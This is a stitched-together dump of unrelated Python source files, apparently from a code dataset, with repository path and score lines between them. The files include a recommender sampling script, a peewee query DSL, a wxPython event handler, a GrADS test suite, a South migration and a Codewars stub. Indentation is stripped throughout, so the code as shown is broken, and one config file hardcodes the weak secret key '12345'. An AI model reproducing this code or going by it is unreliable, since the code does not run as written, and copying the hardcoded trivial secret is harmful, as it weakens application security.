total_data.save_index(path_uptil_now + "/complete_data/")
# Frequency sample from user hist (Stratified)
print("\n{} split, user history random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.frequency_sample(percent, 0)
total_data.save_index(path_uptil_now + str(percent) + "_perc_freq_user_rns")
# Sample users randomly
print("\n{} split, user random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.user_random_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_user_rns")
# Sample interactions randomly
print("\n{} split, interaction random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.interaction_random_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_interaction_rns")
# Temporal sampling
print("\n{} split, user history temporal sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.temporal_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_temporal")
# Remove tail users sampling
print("\n{} split, tail user sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.tail_user_remove(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_tail_user_remove")
# Pagerank based sampling
print("\n{} split, pagerank sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.pagerank_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_pagerank")
# RW based sampling
print("\n{} split, random walk sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.random_walk_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_random_walk")
# Forest-fire based sampling
print("\n{} split, forest fire sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.forest_fire_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_forest_fire")
# Sample interactions according to SVP
hyper_params = {}
hyper_params['dataset'] = dataset
hyper_params['sampling'] = 'complete_data' # While training the proxy model
for proxy_model in [ 'bias_only', 'MF_dot' ]:
scenarios = [ 'sequential' ] if train_test_split == 'leave_2' else [ 'implicit', 'explicit' ]
for loss_type in scenarios:
print() ; svp_handler = SVPHandler(proxy_model, loss_type, hyper_params)
for sampling in [
'forgetting_events',
'forgetting_events_propensity',
'forgetting_events_user',
'forgetting_events_user_propensity',
]:
print("\n{} split, SVP: {}_{}, {} loss".format(train_test_split, proxy_model, sampling, loss_type))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.svp_sample(percent, svp_handler, sampling)
total_data.save_index(path_uptil_now + "svp_{}_{}/{}_perc_{}".format(proxy_model, loss_type, percent, sampling))
| 2.484375 | 2 |
playhouse/sweepea.py | mikiec84/peewee | 1 | 12786525 | <reponame>mikiec84/peewee
"""
Querying using an "ISBL"-like syntax, inspired by
https://github.com/akrito/horrorm
http://www.reddit.com/r/programming/comments/2wycq/given_that_ruby_fans_like_the_idea_of_dsls_its/c2x1t2
Example ISBL:
(t1 * t2) : c1 = v1, c2 = v2 % projection
Swee'pea:
(t1 * t2) ** (c1 == v1, c2 == v2) % (t1.f1, t1.f2, t2.f1)
"""
from peewee import *
from peewee import BaseModel
_Model = Model
class T(object):
def __init__(self, *models):
self.models = list(models)
self.query = None
self.projection = None
self.ordering = None
def __mul__(self, rhs):
if isinstance(rhs, T):
self.models.extend(rhs.models)
else:
self.models.append(rhs)
return self
def __pow__(self, rhs):
self.query = rhs
return self
def __mod__(self, rhs):
if not isinstance(rhs, (list, tuple)):
rhs = [rhs]
self.projection = rhs
return self
def __lshift__(self, rhs):
self.ordering = rhs
return self
def q(self):
if self.projection:
select = {}
for field in self.projection:
select.setdefault(field.model, [])
select[field.model].append(field.name)
else:
select = dict((m, ['*']) for m in self.models)
sq = self.models[0].select(select)
if self.ordering:
sq = sq.order_by(self.ordering)
for model in self.models[1:]:
sq = sq.join(model)
if self.query:
sq = sq.where(self.query)
return sq.naive()
def __iter__(self):
return iter(self.q())
class ISBLBaseModel(BaseModel):
def __mul__(cls, rhs):
return T(cls) * rhs
def __pow__(cls, rhs):
return T(cls) ** rhs
def __mod__(cls, rhs):
return T(cls) % rhs
def __lshift__(cls, rhs):
return T(cls) << rhs
class Model(_Model):
__metaclass__ = ISBLBaseModel
| 2.84375 | 3 |
clusteris/main/interactor.py | iturricf/clusteris | 0 | 12786526 | # -*- coding: utf-8 -*-
import wx
class Interactor(object):
"""Connects the UI events with the Presenter class."""
def Connect(self, presenter, view):
"""Listens to UI evens and asigns an event handler on the Presenter."""
self.presenter = presenter
self.view = view
# Menu Archivo
view.Bind(wx.EVT_MENU, self.OnOpenDatasetClicked, view.mItemDataset)
view.Bind(wx.EVT_MENU, self.OnExportImageClicked, view.mItemExportImage)
view.Bind(wx.EVT_MENU, self.OnExportCsvClicked, view.mItemExportCsv)
view.Bind(wx.EVT_MENU, self.OnExitClicked, view.mItemExit)
# Menu Proceso
view.Bind(wx.EVT_MENU, self.OnProcessDataset, view.mItemProcess)
view.Bind(wx.EVT_MENU, self.OnPlotResults, view.mItemPlot)
view.Bind(wx.EVT_CLOSE, self.OnExitClicked)
# Menu Ayuda
view.Bind(wx.EVT_MENU, self.OnHelpGetHelp, view.mItemHelp)
view.Bind(wx.EVT_MENU, self.OnHelpAbout, view.mItemAbout)
view.Bind(view.EVT_FILE_SELECTED, self.OnFileSelected)
view.Bind(view.EVT_EXPORT_CSV_FILE_SELECTED, self.OnExportCsvFileSelected)
view.Bind(view.EVT_EXPORT_PNG_FILE_SELECTED, self.OnExportPngFileSelected)
def OnOpenDatasetClicked(self, evt):
self.presenter.ShowFileDialog()
def OnExportImageClicked(self, evt):
self.presenter.ShowExportImageDialog()
def OnExportPngFileSelected(self, evt):
self.presenter.ExportPngFile(evt.path)
def OnExportCsvClicked(self, evt):
self.presenter.ShowExportCsvDialog()
def OnExportCsvFileSelected(self, evt):
self.presenter.ExportCsvFile(evt.path)
def OnFileSelected(self, evt):
self.presenter.SetSelectedFile(evt.path)
def OnProcessDataset(self, evt):
self.presenter.ShowDatasetConfigDialog()
# self.presenter.Process()
def OnHelpGetHelp(self, evt):
wx.BeginBusyCursor()
import webbrowser
webbrowser.open("https://github.com/iturricf/clusteris/wiki/How-to-use-Clusteris")
wx.EndBusyCursor()
def OnHelpAbout(self, evt):
box = wx.MessageDialog(None, 'ClusteRIS v1.0 \nAplicación desarrollada para lograr el agrupamiento de datos mediante la técnica de algoritmos genéticos. \n\n Autores: <NAME>, <NAME> y <NAME>.', 'Acerca de CluteRIS', wx.OK)
box.ShowModal()
def OnPlotResults(self, evt):
self.presenter.ShowPlotConfigDialog()
# self.presenter.Plot()
def OnExitClicked(self, evt):
self.presenter.Close()
| 2.421875 | 2 |
app/instance/config.py | Rickyngotho/pitch | 0 | 12786527 | SECRET_KEY = '12345' | 0.957031 | 1 |
web3/utils/functional.py | bellaj/web3py | 0 | 12786528 | <reponame>bellaj/web3py<gh_stars>0
import functools
from eth_utils import (
compose,
)
def apply_formatters_to_return(*formatters):
formatter = compose(*formatters)
def outer(fn):
@functools.wraps(fn)
def inner(*args, **kwargs):
value = fn(*args, **kwargs)
return formatter(value)
return inner
return outer
| 2.4375 | 2 |
test/test_delete_group.py | NikolayLukyanov/python_pfqa | 0 | 12786529 | <reponame>NikolayLukyanov/python_pfqa
from model.group import Group
import random
def test_delete_random_group(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(group_name="zaglushka"))
oldgroups = db.get_group_list()
group = random.choice(oldgroups)
app.group.delete_by_id(group.id)
newgroups = db.get_group_list()
#check, that list of oldgroup without deleted element is equal to the list of group after deletion random group
oldgroups.remove(group)
assert oldgroups == newgroups
if check_ui:
assert sorted(db.get_stripped_group_list(), key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max) | 2.96875 | 3 |
wgrib2-v0.1.9.4/pytests/TestModelFile.py | jprules321/colas | 0 | 12786530 | """
Test Basic GrADS Operations on the standard "model" test file.
"""
# Add parent directory to python search path
# ------------------------------------------
import os
import sys
sys.path.insert(0,'..')
sys.path.insert(0,'lib')
import unittest
from grads import GrADS
class TestModelFile(unittest.TestCase):
def tearDown(self):
del self.ga
# os.system("/bin/rm -rf output")
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['ps', 'ts', 'pr', 'ua', 'va', 'zg', 'ta', 'hus']
var_levs = [0, 0, 0, 7, 7, 7, 7, 7]
nx, ny, nz, nt = (72, 46, 7, 5)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_02_Execs(self):
"""
Exercises the exec command using both Unix and DOS text files.
"""
self.ga("exec Exec.ga")
self.ga("exec Exec_dos.ga")
def test_02_Prints(self):
"""
Exercises print/print file.eps/printim but does verify results.
This is not really a test as it does not check the outcome.
"""
self.ga("display ps")
self.ga("print output/ps.eps")
self.ga("enable print output/ps.gx")
self.ga("print output/ps.eps")
self.ga("disable print")
def test_02_Printim(self):
"""
Exercises printim - not really a test as it does not check outcome.
"""
self.ga("q config")
cf = self.ga.rline(1)
if 'printim' in cf:
self.ga("printim output/ps.png")
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('ps',500,1000,50,z=1,t=1)
self._CheckCint('ts',240,310,10,z=1,t=1)
self._CheckCint('10000*pr',0,8,1,z=1,t=1)
self._CheckCint('ps',500,1000,50,z=1,t=5)
self._CheckCint('ts',240,310,10,z=1,t=5)
self._CheckCint('10000*pr',0,10,1,z=1,t=5)
self._CheckCint('ua',-12,18,3,z=1,t=1)
self._CheckCint('va',-15,15,3,z=1,t=1)
self._CheckCint('zg',-100,300,50,z=1,t=1)
self._CheckCint('ta',245,300,5,z=1,t=1)
self._CheckCint('1000*hus',2,20,2,z=1,t=5)
self._CheckCint('ua',-15,50,5,z=7,t=5)
self._CheckCint('va',-20,20,5,z=7,t=5)
self._CheckCint('zg',14800,16400,200,z=7,t=5)
self._CheckCint('ta',195,225,5,z=7,t=5)
self._CheckCint('10000*hus',1,9,1,z=5,t=5)
def test_04_Write_generic(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/sequential -format sequential -vars ps ta -func sqrt(@) -time = = 2 ")
def test_04_Write_stream(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/stream -be -format stream")
def test_05_Read_stream(self):
fh = self.ga.open("stream.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def test_04_Write_sequential(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/sequential -le -format sequential")
def test_05_Read_sequential(self):
fh = self.ga.open("sequential.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def test_04_stats(self):
self.ga("set x 1 72")
self.ga("lats4d -format stats")
def test_04_Write_mean(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/mean -format stream -mean")
def xtest_06_regriding_linear(self):
self._CheckCint2("re(ts,2,2,bl)",240,310,10)
self._CheckCint2("re(ts,2,1,bl)",240,310,10)
def xtest_06_regriding_bessel(self):
self._CheckCint2("re(ts,2,2,bs)",240,310,10)
self._CheckCint2("re(ts,2,1,bs)",240,310,10)
def xtest_06_regriding_box_average(self):
self._CheckCint2("re(ts,2,2,ba)",240,310,10)
self._CheckCint2("re(ts,2,1,ba)",240,310,10)
def xtest_06_regriding_box_voting(self):
self._CheckCint2("1e4*re(pr,8,8,vt,0.6,0.2)",0,8,1)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _CheckCint2(self,name,cmin,cmax,cint):
"""
Check contour intervals during display.
"""
self.ga.cmd('clear')
self.ga.cmd('display %s'%name)
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _CompareFiles(self,fh1,fh2):
vars1 = fh1.vars[:]
vars2 = fh2.vars[:]
self.assertEqual(vars1.sort(),vars2.sort())
self.assertEqual(fh1.nt,fh2.nt)
for i in range(len(fh1.vars)):
var = fh1.vars[i]
nz = fh1.var_levs[i]
if nz==0: nz=1
if var=='hus': nz=5
nt = fh1.nt
for t in range(1,nt+1):
for z in range(1,nz+1):
self.ga('clear')
self.ga('display %s.%d(z=%d,t=%d) - %s.%d(z=%d,t=%d)'\
%(var,fh1.fid,z,t,var,fh2.fid,z,t))
# print ">>> t=%d, z=%d, %s --- %s "%(t,z,var,self.ga.rline(1))
self.assertEqual(self.ga.rline(1), \
'Constant field. Value = 0')
def _GenericSetUp(self,bin,dat):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles[dat])
def notest_04_LATS_Coards_1(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model ")
def notest_04_LATS_Coards_2(self):
fh = self.ga.open("output/model.nc")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def notest_04_LATS_GaGrib_1(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model -format grads_grib")
def notest_04_LATS_GaGrib_2(self):
fh = self.ga.open("output/model.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def notest_04_LATS_grib(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model -format grib")
#......................................................................
class TestModelUrl(unittest.TestCase):
def tearDown(self):
del self.ga
# os.system("/bin/rm -rf output")
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['ps', 'ts', 'pr', 'ua', 'va', 'zg', 'ta', 'hus']
var_levs = [0, 0, 0, 7, 7, 7, 7, 7]
nx, ny, nz, nt = (72, 46, 7, 5)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('ps',500,1000,50,z=1,t=1)
self._CheckCint('ts',240,310,10,z=1,t=1)
self._CheckCint('10000*pr',0,8,1,z=1,t=1)
self._CheckCint('ps',500,1000,50,z=1,t=5)
self._CheckCint('ts',240,310,10,z=1,t=5)
self._CheckCint('10000*pr',0,10,1,z=1,t=5)
self._CheckCint('ua',-12,18,3,z=1,t=1)
self._CheckCint('va',-15,15,3,z=1,t=1)
self._CheckCint('zg',-100,300,50,z=1,t=1)
self._CheckCint('ta',245,300,5,z=1,t=1)
self._CheckCint('1000*hus',2,20,2,z=1,t=5)
self._CheckCint('ua',-15,50,5,z=7,t=5)
self._CheckCint('va',-20,20,5,z=7,t=5)
self._CheckCint('zg',14800,16400,200,z=7,t=5)
self._CheckCint('ta',195,225,5,z=7,t=5)
self._CheckCint('10000*hus',1,9,1,z=5,t=5)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
sys.stdout.write(name+' ... ')
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _GenericSetUp(self,bin,dat):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles[dat])
#......................................................................
class TestStnUrl(unittest.TestCase):
def _GenericSetUp(self,bin,url):
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga('open ' + url)
def tearDown(self):
del self.ga
def test_01_Open(self):
ga = self.ga
ga('q file')
Binary = ga.rword(3,2)
Type = ga.rword(4,3) + ' ' + ga.rword(4,4)
Tsize = ga.rword(5,3)
nvars = ga.rword(6,5)
self.assertEqual(Binary,'http://monsoondata.org:9090/dods/stn/metar/2009/02/day05')
self.assertEqual(Type,'Station Data')
self.assertEqual(Tsize,'24')
self.assertEqual(nvars,'10')
vars = ['cld','ds','filt','ptype','slp','ts','us','vis','vs','wx']
for i in range(10):
self.assertEqual(vars[i],ga.rword(7+i,1))
def test_01_Stats(self):
ga = self.ga
ga('set gxout stat')
# var count undef nu min max cmin cmax cint
# self._stats( 'cld','2842','-9.99e+08', '0', '20','25','20','25','0.5')
# self._stats( 'ds', '2842','-9.99e+08','133','-49','27','-40','20','10')
# self._stats( 'filt', '2842','-9.99e+08','0','0','6','0','6','0.5')
self._stats( 'slp', '2842','-9.99e+08','1496','982.5','1046.5','985','1045','5')
self._stats( 'ts', '2842','-9.99e+08','16','-44','99','-40','90','10')
self._stats( 'us', '2842','-9.99e+08','4','-31','31.0098','-30','30','5')
self._stats( 'vs', '2842','-9.99e+08','4','-24.2488','28','-20','25','5')
def _stats(self,var,count,v_undef,n_undef,min,max,cmin,cmax,cint):
ga = self.ga
ga('set gxout stat')
ga('display '+var)
sys.stdout.write(var+' ... ')
self.assertEqual(count,ga.rword(6,4))
self.assertEqual(v_undef,ga.rword(7,4))
self.assertEqual(n_undef,ga.rword(8,4))
# self.assertEqual(min,ga.rword(9,4))
# self.assertEqual(max,ga.rword(9,5))
self.assertEqual(cmin,ga.rword(10,5))
self.assertEqual(cmax,ga.rword(10,6))
self.assertEqual(cint,ga.rword(10,7))
#......................................................................
class TestPdefFile(unittest.TestCase):
def tearDown(self):
del self.ga
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['pslv']
var_levs = [ 0 ]
nx, ny, nz, nt = (333,182,20,1)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('pslv',1004,1026,2,z=1,t=1)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(2,2)))
self.assertEqual(cmax,int(self.ga.rword(2,4)))
self.assertEqual(cint,int(self.ga.rword(2,6)))
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['pdef'])
#......................................................................
class TestGrb2File(unittest.TestCase):
def tearDown(self):
del self.ga
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['grb2'])
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['apcpsfc', 'hgtprs', 'prmslmsl', 'rhprs', 'tmpprs', 'ugrdprs', 'vgrdprs']
var_levs = [0, 3, 0, 3, 3, 3, 3]
nx, ny, nz, nt = (144,73,3,4) # no E size yet
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('apcpsfc',0,140,10,z=1,t=2)
self._CheckCint('0.01*prmslmsl',950,1050,10,z=1,t=1)
self._CheckCint('hgtprs',900, 1600,100,z=1,t=1)
self._CheckCint('rhprs',0,100,10,z=1,t=1)
self._CheckCint('tmpprs',235,300,5,z=1,t=1)
self._CheckCint('ugrdprs',-30,30,10,z=1,t=1)
self._CheckCint('vgrdprs',-25,35,5,z=1,t=1)
self._CheckCint('apcpsfc',0,80,10,z=1,t=4)
self._CheckCint('0.01*prmslmsl',950,1040,10,z=1,t=4)
self._CheckCint('hgtprs',900, 1600,100,z=1,t=4)
self._CheckCint('rhprs',0,100,10,z=1,t=4)
self._CheckCint('tmpprs',240,300,5,z=1,t=4)
self._CheckCint('ugrdprs',-25,30,5,z=1,t=4)
self._CheckCint('vgrdprs',-25,30,5,z=1,t=4)
self._CheckCint('hgtprs',10800,12400,200,z=3,t=4)
self._CheckCint('rhprs',0,100,10,z=3,t=4)
self._CheckCint('tmpprs',200,235,5,z=3,t=4)
self._CheckCint('ugrdprs',-40,100,10,z=3,t=4)
self._CheckCint('vgrdprs',-50,50,10,z=3,t=4)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['grb2'])
#......................................................................
# -----
# grads
# -----
class grads_grb(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','grb')
def test_05_Read_stream(self): pass
def test_05_Read_sequential(self): pass
class grads_grb2(TestGrb2File):
"""Grib-2 specific tests"""
def setUp(self):
self._GenericSetUp('grads')
class grads_nc(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','nc')
class grads_ctlnc(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','ctlnc')
class grads_url(TestModelUrl):
def setUp(self):
self._GenericSetUp('grads','url')
class grads_stn(TestStnUrl):
def setUp(self):
self._GenericSetUp('grads','http://monsoondata.org:9090/dods/stn/metar/2009/02/day05')
class grads_hdf(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','hdf')
class grads_ctlhdf(TestModelFile):
def setUp(self):
self._GenericSetUp('grads','ctlhdf')
class grads_pdef(TestPdefFile):
def setUp(self):
self._GenericSetUp('grads')
# --------
# gradsdap
# --------
class gradsdap_grb(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','grb')
def test_05_Read_stream(self):
pass
def test_05_Read_sequential(self):
pass
class gradsdap_grb2(TestGrb2File):
"""Grib-2 specific tests"""
def setUp(self):
self._GenericSetUp('gradsdap')
class gradsdap_nc(TestModelUrl):
def setUp(self):
self._GenericSetUp('gradsdap','nc')
class gradsdap_ctlnc(TestModelUrl):
def setUp(self):
self._GenericSetUp('gradsdap','ctlnc')
class gradsdap_url(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','url')
class gradsdap_ctlhdf(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','ctlhdf')
class gradsdap_hdf(TestModelFile):
def setUp(self):
self._GenericSetUp('gradsdap','hdf')
class gradsdap_pdef(TestPdefFile):
def setUp(self):
self._GenericSetUp('gradsdap')
#......................................................................
def run_all_tests(verb=2,BinDir=None,DataDir=None):
"""
Runs all tests based on the standard *model* testing file.
"""
# Search for a reasonable default for binary dir
# ----------------------------------------------
if BinDir is None:
BinDir = ''
if os.path.exists('../src/grad.c'):
BinDir = '../src/'
# Search for a reasonable default for data files
# ----------------------------------------------
if DataDir is None:
sample = 'model.grb'
for dir in ( '.', 'data', '../data', '../../../data'):
if os.path.exists(dir+'/'+sample):
DataDir = dir + '/'
break
# File names
# ----------
global GrADSTestFiles
GrADSTestFiles = { 'grb' : DataDir+'model.ctl', \
'grb2': DataDir+'model_25.ctl', \
'nc' : DataDir+'model.nc', \
'ctlnc' : DataDir+'model_nc.ctl', \
'url' : 'http://monsoondata.org:9090/dods/model', \
'hdf' : DataDir+'model.hdf', \
'ctlhdf' : DataDir+'model_sds.ctl', \
'pdef': DataDir+'pdef.ctl', \
'dap' : DataDir+'model_dap.ddf' }
global GrADSBinaryFiles
GrADSBinaryFiles = { 'grads' : BinDir+'grads', \
'gradsdap' : BinDir+'gradsdap' }
print ""
print "Testing with GrADS Data Files from " + DataDir
if BinDir is '':
print "Testing with GrADS binaries from PATH"
rc = os.system('which grads')
if rc:
raise GrADSError, "cannot find grads"
else:
print "Testing with GrADS binaries from " + BinDir
print ""
# Assemble the test suite
# -----------------------
load = unittest.TestLoader().loadTestsFromTestCase
TestSuite = []
npass = 0
Failed = []
# grads
# -----
bin = 'grads'
if os.path.exists(GrADSBinaryFiles[bin]):
TestSuite.append(load(grads_grb))
TestSuite.append(load(grads_grb2))
TestSuite.append(load(grads_nc))
TestSuite.append(load(grads_ctlnc))
TestSuite.append(load(grads_url))
TestSuite.append(load(grads_stn))
TestSuite.append(load(grads_hdf))
TestSuite.append(load(grads_ctlhdf))
TestSuite.append(load(grads_pdef))
print '+ Will test GrADS binary <%s>'%GrADSBinaryFiles[bin]
npass += 1
else:
print '- Not testing GrADS binary <%s>, file missing'%GrADSBinaryFiles[bin]
Failed.append(GrADSBinaryFiles[bin])
print ""
all = unittest.TestSuite(TestSuite)
# gradsdap
# --------
bin = 'gradsdap'
if os.path.exists(GrADSBinaryFiles[bin]):
TestSuite.append(load(gradsdap_grb))
TestSuite.append(load(gradsdap_grb2))
TestSuite.append(load(gradsdap_nc))
TestSuite.append(load(gradsdap_ctlnc))
TestSuite.append(load(gradsdap_url))
TestSuite.append(load(gradsdap_hdf))
TestSuite.append(load(gradsdap_ctlhdf))
TestSuite.append(load(gradsdap_pdef))
print '+ Will test GrADS binary <%s>'%GrADSBinaryFiles[bin]
npass += 1
else:
print '- Not testing GrADS binary <%s>, file missing'%GrADSBinaryFiles[bin]
Failed.append(GrADSBinaryFiles[bin])
print ""
all = unittest.TestSuite(TestSuite)
if not npass:
print "Could not find a single binary to test..."
return 1
# Go for it
# ---------
os.system("/bin/rm -rf output")
os.system("/bin/mkdir -p output")
Results = unittest.TextTestRunner(verbosity=verb).run(all)
if len(Failed)>0:
print "Could NOT test %s GrADS binaries: "%len(Failed), Failed
# Return number of errors+failures: skipped binaries do not count
# ---------------------------------------------------------------
if not Results.wasSuccessful():
raise IOError, 'GrADS tests failed'
else:
os.system("/bin/rm -rf output .grads.lats.table")
| 2.625 | 3 |
virtual/lib/python3.6/site-packages/category/south_migrations/0001_initial.py | kenmutuma001/galleria | 0 | 12786531 | <reponame>kenmutuma001/galleria<gh_stars>0
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Category'
db.create_table('category_category', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255, db_index=True)),
))
db.send_create_signal('category', ['Category'])
# Adding model 'Tag'
db.create_table('category_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=255, db_index=True)),
))
db.send_create_signal('category', ['Tag'])
# Adding M2M table for field categories on 'Tag'
db.create_table('category_tag_categories', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('tag', models.ForeignKey(orm['category.tag'], null=False)),
('category', models.ForeignKey(orm['category.category'], null=False))
))
db.create_unique('category_tag_categories', ['tag_id', 'category_id'])
def backwards(self, orm):
# Deleting model 'Category'
db.delete_table('category_category')
# Deleting model 'Tag'
db.delete_table('category_tag')
# Removing M2M table for field categories on 'Tag'
db.delete_table('category_tag_categories')
models = {
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['category']
| 2.25 | 2 |
8kyu/get_the_middle_character.py | nhsz/codewars | 1 | 12786532 | # http://www.codewars.com/kata/56747fd5cb988479af000028/
def get_middle(s):
